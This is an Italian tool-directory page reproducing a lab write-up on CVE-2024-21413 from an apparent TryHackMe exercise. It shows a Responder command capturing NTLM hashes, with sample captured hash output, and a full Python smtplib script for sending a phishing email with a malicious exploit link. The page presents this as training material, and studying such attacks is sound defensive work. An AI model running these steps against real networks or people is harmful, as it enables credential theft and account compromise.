Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413 — Il progetto è stato creato per dimostrare l'uso di vari strumenti per catturare hash NTLM dagli utenti su una rete e per eseguire attacchi di phishing tramite email. Questo mostra come le vulnerabilità dell'autenticazione di rete e i metodi di phishing possano essere sfruttati per compromettere i sistemi. | Kitploit
Strumenti/GitHubGitHub/artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413
OSINT (Open Source Intelligence)Password CrackingRicognizioneExploitPhishingIngegneria SocialeApprendimento e FormazioneLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

GitHub
artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413

Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413

Vedi Repository
1 anno faNon ancora revisionato

Il progetto è stato creato per dimostrare l'uso di vari strumenti per catturare hash NTLM dagli utenti su una rete e per eseguire attacchi di phishing tramite email. Questo mostra come le vulnerabilità dell'autenticazione di rete e i metodi di phishing possano essere sfruttati per compromettere i sistemi.

Condividi

Obiettivo del Progetto: Il progetto è stato creato per dimostrare l'uso di vari strumenti per catturare hash NTLM dagli utenti su una rete e per eseguire attacchi di phishing tramite email. Questo mostra come le vulnerabilità di autenticazione di rete e i metodi di phishing possano essere sfruttati per compromettere i sistemi.

Descrizione del Processo

  1. Cattura degli Hash NTLM usando Responder Inizialmente, ho usato lo strumento Responder per catturare hash di autenticazione sulla rete. Responder consente di intercettare query come LLMNR, NBT-NS e MDNS per raccogliere hash NTLM degli utenti. Questo è un passo importante per attacchi mirati a ottenere accesso ai sistemi usando hash catturati.

Ho eseguito il seguente comando per avviare Responder:

root@ip-10-10-192-145:~# sudo responder -I ens5

Ho configurato Responder per ascoltare sull'interfaccia ens5. Ha immediatamente iniziato a intercettare richieste di autenticazione, permettendomi di visualizzare hash NTLM dagli utenti sulla rete, come THM-MONIKERLINK\tryhackme e WORKGROUP\Administrator. Ecco come appariva l'output durante la cattura degli hash:

[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB

Questi hash possono poi essere utilizzati per attacchi come brute force o attacchi con hash.

  1. Email di Phishing con Exploit Successivamente, ho creato un'email di phishing contenente un link a un file malevolo. Utilizzando uno script Python con la libreria smtplib, ho inviato l'email all'indirizzo della vittima. L'email includeva un link HTML che appariva sicuro ma in realtà portava a un file progettato per sfruttare una vulnerabilità.

Il link di phishing nell'email era così:

Clicca qui

Ecco lo script Python completo utilizzato per inviare l'email di phishing:

import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr

sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")

html_content = """\

Click me

"""

message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email

msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)

server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()

try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)

try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()

Questo script invia un'email con un link malevolo, che potrebbe potenzialmente sfruttare la vulnerabilità CVE-2024-21413.

Risultati Come risultato, sono riuscito a dimostrare due aspetti chiave:

  • Catturare hash NTLM usando lo strumento Responder, che è un passo cruciale per attaccare l'autenticazione di rete.

  • Phishing e sfruttamento di vulnerabilità tramite email usando lo script Python. Inviare email di phishing con link malevoli può ingannare gli utenti e portare alla compromissione del sistema.

Questo progetto ha mostrato come le vulnerabilità di rete e gli attacchi di phishing possano essere sfruttati per ottenere accesso ai sistemi. Ha anche evidenziato l'importanza di difendersi da tali attacchi tramite metodi di autenticazione forti e filtraggio del traffico email.

Scarica lo strumento